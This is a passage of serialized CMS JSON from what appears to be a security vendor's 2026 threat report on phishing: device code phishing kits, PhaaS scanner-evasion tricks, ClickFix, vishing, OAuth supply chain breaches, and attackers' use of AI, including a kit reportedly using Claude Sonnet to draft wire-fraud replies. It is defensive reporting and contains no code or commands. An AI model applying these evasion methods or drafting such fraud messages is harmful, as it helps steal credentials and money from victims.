",{"data":2968,"content":2970,"nodeType":580},{"uri":2969},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fadt-confirms-data-breach-after-shinyhunters-leak-threat\u002F",[2971],{"data":2972,"marks":2973,"value":2974,"nodeType":448},{},[],"ADT",{"data":2976,"marks":2977,"value":2978,"nodeType":448},{},[]," (5.5M records), ",{"data":2980,"content":2982,"nodeType":580},{"uri":2981},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcharter-communications-data-breach-affects-49-million-accounts\u002F",[2983],{"data":2984,"marks":2985,"value":2986,"nodeType":448},{},[],"Charter Communications",{"data":2988,"marks":2989,"value":2990,"nodeType":448},{},[]," (4.9M accounts), ",{"data":2992,"content":2994,"nodeType":580},{"uri":2993},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F24\u002Fshinyhunters_claim_cruise_giant_carnivals\u002F",[2995],{"data":2996,"marks":2997,"value":2998,"nodeType":448},{},[],"Carnival Corporation",{"data":3000,"marks":3001,"value":3002,"nodeType":448},{},[]," (6M records), and",{"data":3004,"content":3006,"nodeType":580},{"uri":3005},"https:\u002F\u002Fwww.theregister.com\u002F2026\u002F04\u002F28\u002Fpitney_bowes_is_the_latest\u002F",[3007],{"data":3008,"marks":3009,"value":3010,"nodeType":448},{},[]," Pitney Bowes",{"data":3012,"marks":3013,"value":3014,"nodeType":448},{},[]," (8.2M emails per HIBP). ",{"data":3016,"content":3018,"nodeType":580},{"uri":3017},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fad-tech-firm-optimizely-confirms-data-breach-after-vishing-attack\u002F",[3019],{"data":3020,"marks":3021,"value":3022,"nodeType":448},{},[],"Optimizely",{"data":3024,"marks":3025,"value":3026,"nodeType":448},{},[]," is notable as the first confirmed case where attackers deployed both AiTM credential harvesting and device code phishing against the same target.",{"data":3028,"content":3029,"nodeType":455},{},[3030,3034,3041,3045,3053,3057,3065],{"data":3031,"marks":3032,"value":3033,"nodeType":448},{},[],"Since mid-2025, SaaS apps like Salesforce have been a persistent target for data theft and extortion — as seen in the first large-scale criminal ",{"data":3035,"content":3036,"nodeType":580},{"uri":2324},[3037],{"data":3038,"marks":3039,"value":3040,"nodeType":448},{},[],"device code phishing",{"data":3042,"marks":3043,"value":3044,"nodeType":448},{},[]," campaign that preceded this year's adoption spike. ShinyHunters also led the way with OAuth supply chain abuse — compromising SaaS vendors like ",{"data":3046,"content":3048,"nodeType":580},{"uri":3047},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fdata-theft-salesforce-instances-via-salesloft-drift",[3049],{"data":3050,"marks":3051,"value":3052,"nodeType":448},{},[],"Salesloft, Drift, and GainSight",{"data":3054,"marks":3055,"value":3056,"nodeType":448},{},[]," and leveraging stored OAuth tokens to penetrate downstream customer environments, a pattern that has since ",{"data":3058,"content":3060,"nodeType":580},{"uri":3059},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach",[3061],{"data":3062,"marks":3063,"value":3064,"nodeType":448},{},[],"repeated at scale",{"data":3066,"marks":3067,"value":2375,"nodeType":448},{},[],{"data":3069,"content":3070,"nodeType":519},{},[3071],{"data":3072,"marks":3073,"value":3075,"nodeType":448},{},[3074],{"type":452},"Copycats and nation-state adoption",{"data":3077,"content":3078,"nodeType":455},{},[3079,3083,3091,3095,3103,3107,3115,3119,3127],{"data":3080,"marks":3081,"value":3082,"nodeType":448},{},[],"Wider groups are now running the SLH playbook independently. ",{"data":3084,"content":3086,"nodeType":580},{"uri":3085},"https:\u002F\u002Fhackread.com\u002Fpink-extortion-microsoft-365-cloud-data-vishing-scams\u002F",[3087],{"data":3088,"marks":3089,"value":3090,"nodeType":448},{},[],"Pink",{"data":3092,"marks":3093,"value":3094,"nodeType":448},{},[]," (the latest rebrand in the",{"data":3096,"content":3098,"nodeType":580},{"uri":3097},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Func6671-targets-financial-services-and-enterprise-cloud-environments",[3099],{"data":3100,"marks":3101,"value":3102,"nodeType":448},{},[]," BlackFile",{"data":3104,"marks":3105,"value":3106,"nodeType":448},{},[],"-Redact succession) runs vishing combined with passkey-themed credential phishing for M365 extortion. ",{"data":3108,"content":3110,"nodeType":580},{"uri":3109},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-helix-vishing-group-emerges-in-sharepoint-data-theft-attacks\u002F",[3111],{"data":3112,"marks":3113,"value":3114,"nodeType":448},{},[],"Helix",{"data":3116,"marks":3117,"value":3118,"nodeType":448},{},[]," also emerged shortly after BlackFile shut down, pairing vishing with device code phishing and MFA registration for persistence. ",{"data":3120,"content":3122,"nodeType":580},{"uri":3121},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fkongtuke-hackers-now-use-microsoft-teams-for-corporate-breaches\u002F",[3123],{"data":3124,"marks":3125,"value":3126,"nodeType":448},{},[],"KongTuke",{"data":3128,"marks":3129,"value":3130,"nodeType":448},{},[],", an independent initial access broker, adopted a similar help-desk impersonation model via Teams external messaging.",{"data":3132,"content":3133,"nodeType":455},{},[3134,3138,3146,3150,3158],{"data":3135,"marks":3136,"value":3137,"nodeType":448},{},[],"It's not just criminal groups either. Recently, we saw a campaign linked to Russian actors that used ",{"data":3139,"content":3141,"nodeType":580},{"uri":3140},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2026\u002F07\u002F31\u002Fcaptivecrunch-midnight-blizzard-targets-travelers-worldwide-for-malware-delivery-and-credential-theft\u002F",[3142],{"data":3143,"marks":3144,"value":3145,"nodeType":448},{},[],"compromised hotel and conference Wi-Fi gateways",{"data":3147,"marks":3148,"value":3149,"nodeType":448},{},[]," to direct victims to AiTM, ClickFix, and device code phishing pages. And ",{"data":3151,"content":3153,"nodeType":580},{"uri":3152},"https:\u002F\u002Fcloud.google.com\u002Fblog\u002Ftopics\u002Fthreat-intelligence\u002Fchinese-language-phishing-services\u002F",[3154],{"data":3155,"marks":3156,"value":3157,"nodeType":448},{},[],"Google Threat Intelligence mapped",{"data":3159,"marks":3160,"value":3161,"nodeType":448},{},[]," a dozen Chinese-language PhaaS platforms with real-time MFA interception.",{"data":3163,"content":3167,"nodeType":499},{"target":3164},{"sys":3165},{"id":3166,"type":504,"linkType":505},"6q2NwH6Q4DJE7RNeYheIvJ",[],{"data":3169,"content":3170,"nodeType":515},{},[],{"data":3172,"content":3173,"nodeType":444},{},[3174],{"data":3175,"marks":3176,"value":3178,"nodeType":448},{},[3177],{"type":452},"Phishing infrastructure has reached an industrial scale",{"data":3180,"content":3181,"nodeType":455},{},[3182],{"data":3183,"marks":3184,"value":3185,"nodeType":448},{},[],"The SLH playbook works because it sits on top of an industrialized infrastructure layer that continues to grow. Phishing-as-a-Service platforms, device code phishing kits, ClickFix Malware-as-a-Service providers, vishing operations, and OAuth supply chain attacks have all matured into commodity services — and they're shipping faster than ever.",{"data":3187,"content":3188,"nodeType":519},{},[3189],{"data":3190,"marks":3191,"value":3193,"nodeType":448},{},[3192],{"type":452},"Device code phishing goes mainstream",{"data":3195,"content":3196,"nodeType":455},{},[3197,3201,3207],{"data":3198,"marks":3199,"value":3200,"nodeType":448},{},[],"We're tracking a huge spike in ",{"data":3202,"content":3203,"nodeType":580},{"uri":2324},[3204],{"data":3205,"marks":3206,"value":3040,"nodeType":448},{},[],{"data":3208,"marks":3209,"value":3210,"nodeType":448},{},[]," since the start of 2026, with 25+ distinct kits now offering the technique. At the beginning of the year, we were tracking one or two.",{"data":3212,"content":3213,"nodeType":455},{},[3214,3218,3226,3230,3238,3242,3250,3254,3262],{"data":3215,"marks":3216,"value":3217,"nodeType":448},{},[],"What began with ",{"data":3219,"content":3221,"nodeType":580},{"uri":3220},"https:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fsecurity\u002Fblog\u002F2025\u002F02\u002F13\u002Fstorm-2372-conducts-device-code-phishing-campaign\u002F",[3222],{"data":3223,"marks":3224,"value":3225,"nodeType":448},{},[],"Storm-2372's nation-state campaigns",{"data":3227,"marks":3228,"value":3229,"nodeType":448},{},[]," in August 2024 has proliferated through criminal kits like ",{"data":3231,"content":3233,"nodeType":580},{"uri":3232},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F05\u002Fthe-new-phishing-click-how-oauth-consent.html",[3234],{"data":3235,"marks":3236,"value":3237,"nodeType":448},{},[],"EvilTokens",{"data":3239,"marks":3240,"value":3241,"nodeType":448},{},[]," (340+ organizations in its first five weeks), ",{"data":3243,"content":3245,"nodeType":580},{"uri":3244},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Fkali365-device-code-phishing-kit",[3246],{"data":3247,"marks":3248,"value":3249,"nodeType":448},{},[],"Kali365",{"data":3251,"marks":3252,"value":3253,"nodeType":448},{},[]," (which earned an FBI public advisory), ",{"data":3255,"content":3257,"nodeType":580},{"uri":3256},"https:\u002F\u002Fblog.talosintelligence.com\u002Fartoken-inside-an-eviltokens-affiliate-panel-targeting-microsoft-365\u002F",[3258],{"data":3259,"marks":3260,"value":3261,"nodeType":448},{},[],"ARToken",{"data":3263,"marks":3264,"value":3265,"nodeType":448},{},[],", DEBULL, Forg365, and many more.",{"data":3267,"content":3271,"nodeType":499},{"target":3268},{"sys":3269},{"id":3270,"type":504,"linkType":505},"7G6ytXRQPWatOyYarqgMK2",[],{"data":3273,"content":3274,"nodeType":455},{},[3275],{"data":3276,"marks":3277,"value":3278,"nodeType":448},{},[],"The existing PhaaS marketplace, previously dominated by AiTM phishing kits as the standard, has also pivoted to take advantage of the demand for the technique.",{"data":3280,"content":3281,"nodeType":455},{},[3282,3286,3294],{"data":3283,"marks":3284,"value":3285,"nodeType":448},{},[],"Established AiTM vendors like Tycoon 2FA have ",{"data":3287,"content":3289,"nodeType":580},{"uri":3288},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fdevice-code-phishing\u002F",[3290],{"data":3291,"marks":3292,"value":3293,"nodeType":448},{},[],"added device code phishing",{"data":3295,"marks":3296,"value":3297,"nodeType":448},{},[]," alongside their existing credential-harvesting capabilities, meaning the same platforms now offer both techniques interchangeably based on what works against a given target. Several kits like Venom, EvilTokens, Kali365 all reportedly offer both capabilities, while many of the detections we see match the signatures for existing kits in our database (for example, with Venom triggering our existing Sneaky2FA detections) — suggesting an overlap in kit developers or their codebases.",{"data":3299,"content":3303,"nodeType":499},{"target":3300},{"sys":3301},{"id":3302,"type":504,"linkType":505},"3urXbEwK0OSjXQ7lOMDEoc",[],{"data":3305,"content":3306,"nodeType":455},{},[3307],{"data":3308,"marks":3309,"value":3310,"nodeType":448},{},[],"When you look at the full picture, it's notable to see a mixture of AiTM and device code kits in our top detected kits, with most of the top 5 now offering both.",{"data":3312,"content":3316,"nodeType":499},{"target":3313},{"sys":3314},{"id":3315,"type":504,"linkType":505},"4ipTS2U4HE1VLSLmA6DJgB",[],{"data":3318,"content":3319,"nodeType":455},{},[3320],{"data":3321,"marks":3322,"value":3323,"nodeType":448},{},[],"PhaaS vendors are pivoting because device code phishing defeats all MFA (including passkeys) by targeting the authorization layer rather than the login. It's also an unfamiliar phishing scenario that most people aren't really prepared for.",{"data":3325,"content":3329,"nodeType":499},{"target":3326},{"sys":3327},{"id":3328,"type":504,"linkType":505},"3UDzUCCizPJhXp3SsoZuSK",[],{"data":3331,"content":3332,"nodeType":455},{},[3333],{"data":3334,"marks":3335,"value":3336,"nodeType":448},{},[],"And because they're being used interchangeably, there's no downside for the attacker. In one recent example, we saw the attack automatically fall back to AiTM after the device code method timed out, giving the operator two shots at the same victim without manual intervention.",{"data":3338,"content":3342,"nodeType":499},{"target":3339},{"sys":3340},{"id":3341,"type":504,"linkType":505},"3SPsKzwBNxl4d9QRukBtwt",[],{"data":3344,"content":3345,"nodeType":519},{},[3346],{"data":3347,"marks":3348,"value":3350,"nodeType":448},{},[3349],{"type":452},"PhaaS platform evolution and evasion",{"data":3352,"content":3353,"nodeType":455},{},[3354,3358,3366,3370,3378,3382,3390],{"data":3355,"marks":3356,"value":3357,"nodeType":448},{},[],"The broader PhaaS ecosystem continues to expand and evolve. New platform launches this quarter include ",{"data":3359,"content":3361,"nodeType":580},{"uri":3360},"https:\u002F\u002Fwww.cloudsek.com\u002Fblog\u002Fbluekit-phishing-as-a-service-phaas",[3362],{"data":3363,"marks":3364,"value":3365,"nodeType":448},{},[],"Bluekit",{"data":3367,"marks":3368,"value":3369,"nodeType":448},{},[],", ",{"data":3371,"content":3373,"nodeType":580},{"uri":3372},"https:\u002F\u002Fabnormal.ai\u002Fblog\u002Fblacksite-aitm-phishing-kit-cloaked-gg",[3374],{"data":3375,"marks":3376,"value":3377,"nodeType":448},{},[],"Blacksite and Cloaked.gg",{"data":3379,"marks":3380,"value":3381,"nodeType":448},{},[]," — offering dedicated anti-scanner cloaking as a service for phishing infrastructure — and ",{"data":3383,"content":3385,"nodeType":580},{"uri":3384},"https:\u002F\u002Fthreatactix.com\u002F2026\u002F07\u002F02\u002Fa-rare-look-inside-the-command-and-control-panel-behind-modern-phishing-operations\u002F",[3386],{"data":3387,"marks":3388,"value":3389,"nodeType":448},{},[],"WackoGinx",{"data":3391,"marks":3392,"value":3393,"nodeType":448},{},[],", a multi-platform C2 panel that enables operators to manage simultaneous phishing campaigns.",{"data":3395,"content":3396,"nodeType":455},{},[3397,3401,3409,3413,3421],{"data":3398,"marks":3399,"value":3400,"nodeType":448},{},[],"Sneaky 2FA changes have also been documented, with what ",{"data":3402,"content":3404,"nodeType":580},{"uri":3403},"https:\u002F\u002Fzerobec.com\u002Fblog\u002Fsneaky-2fa-returns-trusted-sender-tenant-branded-microsoft-365-replay",[3405],{"data":3406,"marks":3407,"value":3408,"nodeType":448},{},[],"ZeroBEC calls \"route polymorphism\"",{"data":3410,"marks":3411,"value":3412,"nodeType":448},{},[]," (a complicated way of saying the kit randomizes URL paths and filenames on every visit) while separately adopting ",{"data":3414,"content":3416,"nodeType":580},{"uri":3415},"https:\u002F\u002Fblog.barracuda.com\u002F2026\u002F06\u002F29\u002Femail-threat-radar-june-2026",[3417],{"data":3418,"marks":3419,"value":3420,"nodeType":448},{},[],"split-click buttons and blob URLs",{"data":3422,"marks":3423,"value":3424,"nodeType":448},{},[]," designed to evade link analysis (where buttons have two links: automated scanners interact with one and see a legitimate Microsoft page, but humans naturally click the larger, more visually prominent bottom one and get routed via a blob URL to the phishing page). ",{"data":3426,"content":3427,"nodeType":455},{},[3428,3432,3440],{"data":3429,"marks":3430,"value":3431,"nodeType":448},{},[],"The speed of technique adoption across these platforms is itself accelerating. ",{"data":3433,"content":3435,"nodeType":580},{"uri":3434},"https:\u002F\u002Fsublime.security\u002Fblog\u002Fflowerstorm-unleashes-the-krakvm-phaas-operators-turn-to-vm-based-obfuscation\u002F",[3436],{"data":3437,"marks":3438,"value":3439,"nodeType":448},{},[],"FlowerStorm adopted",{"data":3441,"marks":3442,"value":3443,"nodeType":448},{},[]," KrakVM (an open-source JavaScript VM that compiles malicious JS into encrypted bytecode, defeating email security static analysis) within a month of KrakVM's public release on GitHub. The gap between a new evasion technique appearing publicly and its incorporation into commodity phishing kits has compressed to weeks.",{"data":3445,"content":3446,"nodeType":455},{},[3447,3451,3459,3463,3471],{"data":3448,"marks":3449,"value":3450,"nodeType":448},{},[],"At the same time, target surfaces are expanding: ",{"data":3452,"content":3454,"nodeType":580},{"uri":3453},"https:\u002F\u002Fsecuritylabs.datadoghq.com\u002Farticles\u002Fbehind-the-console-aws-aitm-phishing-kit-and-beyond\u002F",[3455],{"data":3456,"marks":3457,"value":3458,"nodeType":448},{},[],"Datadog documented",{"data":3460,"marks":3461,"value":3462,"nodeType":448},{},[]," an AWS console AiTM kit that dynamically adapts to the victim's configured second factor (an example of ",{"data":3464,"content":3466,"nodeType":580},{"uri":3465},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fmfa-downgrade-attacks",[3467],{"data":3468,"marks":3469,"value":3470,"nodeType":448},{},[],"MFA downgrade",{"data":3472,"marks":3473,"value":3474,"nodeType":448},{},[]," in the wild), extending AiTM phishing from IdPs and SaaS applications to cloud infrastructure consoles.",{"data":3476,"content":3477,"nodeType":519},{},[3478],{"data":3479,"marks":3480,"value":3482,"nodeType":448},{},[3481],{"type":452},"ClickFix as a service",{"data":3484,"content":3485,"nodeType":455},{},[3486,3490,3498,3502,3510],{"data":3487,"marks":3488,"value":3489,"nodeType":448},{},[],"ClickFix has also continued to industrialize. ",{"data":3491,"content":3493,"nodeType":580},{"uri":3492},"https:\u002F\u002Fblog.sekoia.io\u002Funveiling-errtraffic-inside-a-growing-clickfix-malware-distribution-framework\u002F",[3494],{"data":3495,"marks":3496,"value":3497,"nodeType":448},{},[],"Sekoia documented",{"data":3499,"marks":3500,"value":3501,"nodeType":448},{},[]," the ErrTraffic MaaS platform achieving a 60% victim conversion rate, while researchers ",{"data":3503,"content":3505,"nodeType":580},{"uri":3504},"https:\u002F\u002Fkqlquery.com\u002Fposts\u002Fclickfix-gift-that-keeps-on-giving\u002F",[3506],{"data":3507,"marks":3508,"value":3509,"nodeType":448},{},[],"mapped approximately 3,000 live ClickFix payloads",{"data":3511,"marks":3512,"value":3513,"nodeType":448},{},[]," being served through API-driven backends that dynamically generate uniquely obfuscated payloads per victim — essentially the ClickFix PhaaS equivalent.",{"data":3515,"content":3516,"nodeType":455},{},[3517,3521,3529,3533,3541],{"data":3518,"marks":3519,"value":3520,"nodeType":448},{},[],"The technique has also expanded cross-platform, with Unit 42 documenting ",{"data":3522,"content":3524,"nodeType":580},{"uri":3523},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fnew-macos-clickfix-attack-silently-mounts-dmgs-to-push-infostealer\u002F",[3525],{"data":3526,"marks":3527,"value":3528,"nodeType":448},{},[],"macOS ClickFix variants",{"data":3530,"marks":3531,"value":3532,"nodeType":448},{},[]," that mount DMGs and bypass Gatekeeper to deliver AMOS infostealer. At the mass deployment end, over ",{"data":3534,"content":3536,"nodeType":580},{"uri":3535},"https:\u002F\u002Fblog.xlab.qianxin.com\u002Fghost-cms-mass-compromised-via-cve-2026-26980-now-fueling-clickfix-attacks\u002F",[3537],{"data":3538,"marks":3539,"value":3540,"nodeType":448},{},[],"700 Ghost CMS sites were compromised",{"data":3542,"marks":3543,"value":3544,"nodeType":448},{},[]," to serve ClickFix payloads in May, and the Gizmodo homepage was injected in June.",{"data":3546,"content":3547,"nodeType":455},{},[3548,3552,3560,3564,3572],{"data":3549,"marks":3550,"value":3551,"nodeType":448},{},[],"Nation-state actors are building around ClickFix too. Two DPRK subgroups independently stood up ClickFix infrastructure in July: ",{"data":3553,"content":3555,"nodeType":580},{"uri":3554},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fbluenoroff-zoom-phishing-kit-profiles.html",[3556],{"data":3557,"marks":3558,"value":3559,"nodeType":448},{},[],"BlueNoroff",{"data":3561,"marks":3562,"value":3563,"nodeType":448},{},[]," targeting crypto professionals via Zoom impersonation with wallet profiling before payload delivery, and ",{"data":3565,"content":3567,"nodeType":580},{"uri":3566},"https:\u002F\u002Fsocradar.io\u002Fblog\u002Fdprk-clickfake-pylangghost-golangghost-rats\u002F",[3568],{"data":3569,"marks":3570,"value":3571,"nodeType":448},{},[],"Famous Chollima",{"data":3573,"marks":3574,"value":3575,"nodeType":448},{},[]," embedding ClickFix in multi-stage fake job interviews.",{"data":3577,"content":3578,"nodeType":519},{},[3579],{"data":3580,"marks":3581,"value":3583,"nodeType":448},{},[3582],{"type":452},"Vishing as a payload delivery mechanism",{"data":3585,"content":3586,"nodeType":455},{},[3587],{"data":3588,"marks":3589,"value":3590,"nodeType":448},{},[],"Vishing functions as a reliable delivery mechanism for all of these payloads, leveraged by ShinyHunters, Pink, and Helix (among many others) to deliver AiTM and device code phishing. A human operator on a phone call drives the victim through a browser-based technical payload, and the vishing delivery gets around email security controls.",{"data":3592,"content":3593,"nodeType":455},{},[3594,3598,3606],{"data":3595,"marks":3596,"value":3597,"nodeType":448},{},[],"When Push researchers ",{"data":3599,"content":3601,"nodeType":580},{"uri":3600},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel\u002F",[3602],{"data":3603,"marks":3604,"value":3605,"nodeType":448},{},[],"infiltrated the phishing panels",{"data":3607,"marks":3608,"value":3609,"nodeType":448},{},[]," linked to ShinyHunters' campaigns, we found the mechanics for a live attacker relaying credentials and pushing new prompts in real time during the call, across 400+ linked domains and four infrastructure clusters.",{"data":3611,"content":3612,"nodeType":455},{},[3613,3617,3625,3629,3637,3641,3649,3653,3661],{"data":3614,"marks":3615,"value":3616,"nodeType":448},{},[],"The financial scale is now quantifiable: ",{"data":3618,"content":3620,"nodeType":580},{"uri":3619},"https:\u002F\u002Fwww.darkreading.com\u002Fcyberattacks-data-breaches\u002Fsilent-ransom-us-law-firms-extortion-attacks",[3621],{"data":3622,"marks":3623,"value":3624,"nodeType":448},{},[],"Luna Moth",{"data":3626,"marks":3627,"value":3628,"nodeType":448},{},[]," (Silent Ransom Group), a ",{"data":3630,"content":3632,"nodeType":580},{"uri":3631},"https:\u002F\u002Fwww.crowdstrike.com\u002Fen-us\u002Fadversaries\u002Fchatty-spider\u002F",[3633],{"data":3634,"marks":3635,"value":3636,"nodeType":448},{},[],"Russia-linked Conti spinoff",{"data":3638,"marks":3639,"value":3640,"nodeType":448},{},[]," operating independently of the Com, has extracted ",{"data":3642,"content":3644,"nodeType":580},{"uri":3643},"https:\u002F\u002Fwww.theinsurer.com\u002Fti\u002Fnews\u002Fexclusive-weil-gotshal-paid-double-digit-millions-in-suppression-payment-to-luna-2026-05-27\u002F",[3645],{"data":3646,"marks":3647,"value":3648,"nodeType":448},{},[],"up to $48 million",{"data":3650,"marks":3651,"value":3652,"nodeType":448},{},[]," from Am Law 100 firms in 2026 alone, with 48 law firms on their leak site and the ",{"data":3654,"content":3656,"nodeType":580},{"uri":3655},"https:\u002F\u002Fwww.ic3.gov\u002FCSA\u002F2026\u002F260526.pdf",[3657],{"data":3658,"marks":3659,"value":3660,"nodeType":448},{},[],"FBI issuing a dedicated flash alert",{"data":3662,"marks":3663,"value":2375,"nodeType":448},{},[],{"data":3665,"content":3666,"nodeType":455},{},[3667,3671,3679,3683,3691],{"data":3668,"marks":3669,"value":3670,"nodeType":448},{},[],"The infrastructure behind these campaigns is industrializing independently. ",{"data":3672,"content":3674,"nodeType":580},{"uri":3673},"https:\u002F\u002Fwww.okta.com\u002Fblog\u002Fthreat-intelligence\u002Fbehind-the-scenes-of-a-vishing-operation\u002F",[3675],{"data":3676,"marks":3677,"value":3678,"nodeType":448},{},[],"Okta obtained access to Work Panel",{"data":3680,"marks":3681,"value":3682,"nodeType":448},{},[],", a multi-tenant vishing MaaS platform where phishing site standup is a one-button operation and callers are deliberately insulated from the credentials they help steal. Zscaler separately ",{"data":3684,"content":3686,"nodeType":580},{"uri":3685},"https:\u002F\u002Fwww.zscaler.com\u002Fblogs\u002Fsecurity-research\u002Fhelpdesk-hijackers-teams-vishing-quick-assist-and-gogrpc-backdoor",[3687],{"data":3688,"marks":3689,"value":3690,"nodeType":448},{},[],"documented a dedicated Teams-vishing initial access broker",{"data":3692,"marks":3693,"value":3694,"nodeType":448},{},[]," operating since January 2026, building bespoke post-access tooling and selling access to ransomware operators.",{"data":3696,"content":3697,"nodeType":519},{},[3698],{"data":3699,"marks":3700,"value":3702,"nodeType":448},{},[3701],{"type":452},"OAuth supply chain attacks",{"data":3704,"content":3705,"nodeType":455},{},[3706,3710,3717],{"data":3707,"marks":3708,"value":3709,"nodeType":448},{},[],"The OAuth supply chain dimension has also continued to produce confirmed victims. The ",{"data":3711,"content":3712,"nodeType":580},{"uri":3047},[3713],{"data":3714,"marks":3715,"value":3716,"nodeType":448},{},[],"Salesloft\u002FDrift supply chain attack",{"data":3718,"marks":3719,"value":3720,"nodeType":448},{},[]," in 2025 set the template: compromise one SaaS vendor, steal OAuth tokens, access 700+ downstream customer Salesforce environments.",{"data":3722,"content":3723,"nodeType":455},{},[3724,3728,3736,3740,3748,3752,3760],{"data":3725,"marks":3726,"value":3727,"nodeType":448},{},[],"In 2026, the ",{"data":3729,"content":3731,"nodeType":580},{"uri":3730},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fvimeo-data-breach-exposes-personal-information-of-119-000-people\u002F",[3732],{"data":3733,"marks":3734,"value":3735,"nodeType":448},{},[],"Anodot compromise",{"data":3737,"marks":3738,"value":3739,"nodeType":448},{},[]," cascaded through to Vimeo, Rockstar Games, and Zara. The ",{"data":3741,"content":3743,"nodeType":580},{"uri":3742},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Funpacking-the-vercel-breach\u002F",[3744],{"data":3745,"marks":3746,"value":3747,"nodeType":448},{},[],"Context.ai → Vercel",{"data":3749,"marks":3750,"value":3751,"nodeType":448},{},[]," breach followed the same structural pattern. And the ",{"data":3753,"content":3755,"nodeType":580},{"uri":3754},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fklue-oauth-breach-victim-list-grows-as-icarus-hackers-claim-attack\u002F",[3756],{"data":3757,"marks":3758,"value":3759,"nodeType":448},{},[],"Klue\u002FIcarus breach",{"data":3761,"marks":3762,"value":3763,"nodeType":448},{},[]," in June — where attackers pivoted from a legacy credential through stored OAuth tokens to exfiltrate Salesforce data from Huntress, Recorded Future, and Jamf among others — showed that OAuth tokens have become a tried and tested lateral movement vector in SaaS environments.",{"data":3765,"content":3766,"nodeType":515},{},[],{"data":3768,"content":3769,"nodeType":444},{},[3770],{"data":3771,"marks":3772,"value":3774,"nodeType":448},{},[3773],{"type":452},"AI is a force multiplier for attackers",{"data":3776,"content":3777,"nodeType":455},{},[3778],{"data":3779,"marks":3780,"value":3781,"nodeType":448},{},[],"Much of the security industry's AI threat discussion has focused on autonomous offensive AI and novel attack classes like prompt injection. But the place where AI is having the most measurable impact right now is less dramatic and more consequential: it's accelerating how the techniques we've already been tracking get built and operated.",{"data":3783,"content":3784,"nodeType":455},{},[3785],{"data":3786,"marks":3787,"value":3788,"nodeType":448},{},[],"The evidence is visible at every layer of the attack chain. Pretty much every phishing kit we come across in 2026 shows clear signs of vibe coding. For the classic AiTM lure, we used to find heavy obfuscation — attackers used to put a lot of effort into hiding their attacks. But now, they're essentially built to be disposable, and are full of verbose comments and nicely named unobfuscated functions. Why bother hiding when you can just spin up a new one? This is particularly notable when it comes to device code phishing, which owes its massive scale-up this year to vibecoded kits. ",{"data":3790,"content":3791,"nodeType":455},{},[3792,3796,3804],{"data":3793,"marks":3794,"value":3795,"nodeType":448},{},[],"You can see more examples of these kits under the hood in our blog post ",{"data":3797,"content":3799,"nodeType":580},{"uri":3798},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Finside-criminal-phishing-panel",[3800],{"data":3801,"marks":3802,"value":3803,"nodeType":448},{},[],"infiltrating a criminal phishing panel. ",{"data":3805,"marks":3806,"value":21,"nodeType":448},{},[],{"data":3808,"content":3812,"nodeType":499},{"target":3809},{"sys":3810},{"id":3811,"type":504,"linkType":505},"01mOiserRBXraawXwQyJNm",[],{"data":3814,"content":3815,"nodeType":455},{},[3816],{"data":3817,"marks":3818,"value":3819,"nodeType":448},{},[],"Beyond vibe-coded kits, attackers are embedding AI as an integrated operational capability. ",{"data":3821,"content":3822,"nodeType":566},{},[3823,3845,3866,3888,3910],{"data":3824,"content":3825,"nodeType":570},{},[3826],{"data":3827,"content":3828,"nodeType":455},{},[3829,3833,3841],{"data":3830,"marks":3831,"value":3832,"nodeType":448},{},[],"The first major device code phishing kit identified in the wild, EvilTokens, ",{"data":3834,"content":3836,"nodeType":580},{"uri":3835},"https:\u002F\u002Fwww.huntress.com\u002Fblog\u002Frailway-paas-m365-token-replay-campaign",[3837],{"data":3838,"marks":3839,"value":3840,"nodeType":448},{},[],"heavily used Railway",{"data":3842,"marks":3843,"value":3844,"nodeType":448},{},[],", a PaaS built for vibe coding with prompt-based deployment and teardown of infrastructure. EvilTokens itself packaged AI workflows for email filter bypass, lure tailoring, and identifying high-value mailboxes. ",{"data":3846,"content":3847,"nodeType":570},{},[3848],{"data":3849,"content":3850,"nodeType":455},{},[3851,3855,3862],{"data":3852,"marks":3853,"value":3854,"nodeType":448},{},[],"Kali365's E2 edition includes an AI-powered BEC module that ",{"data":3856,"content":3857,"nodeType":580},{"uri":3244},[3858],{"data":3859,"marks":3860,"value":3861,"nodeType":448},{},[],"uses Claude Sonnet",{"data":3863,"marks":3864,"value":3865,"nodeType":448},{},[]," to score intercepted conversations for fraud opportunity and draft contextual wire-transfer redirect replies — not an autonomous attack, but an AI-augmented workflow that makes an existing phishing kit more effective.",{"data":3867,"content":3868,"nodeType":570},{},[3869],{"data":3870,"content":3871,"nodeType":455},{},[3872,3875,3884],{"data":3873,"marks":3874,"value":21,"nodeType":448},{},[],{"data":3876,"content":3878,"nodeType":580},{"uri":3877},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F07\u002Fexposed-server-reveals-ai-assisted.html",[3879],{"data":3880,"marks":3881,"value":3883,"nodeType":448},{},[3882],{"type":588},"Rapid7's analysis of an exposed server",{"data":3885,"marks":3886,"value":3887,"nodeType":448},{},[]," containing a complete phishing toolkit turned up over 1,000 delivery artifacts alongside hardcoded paths to AI coding tools and LLM-style 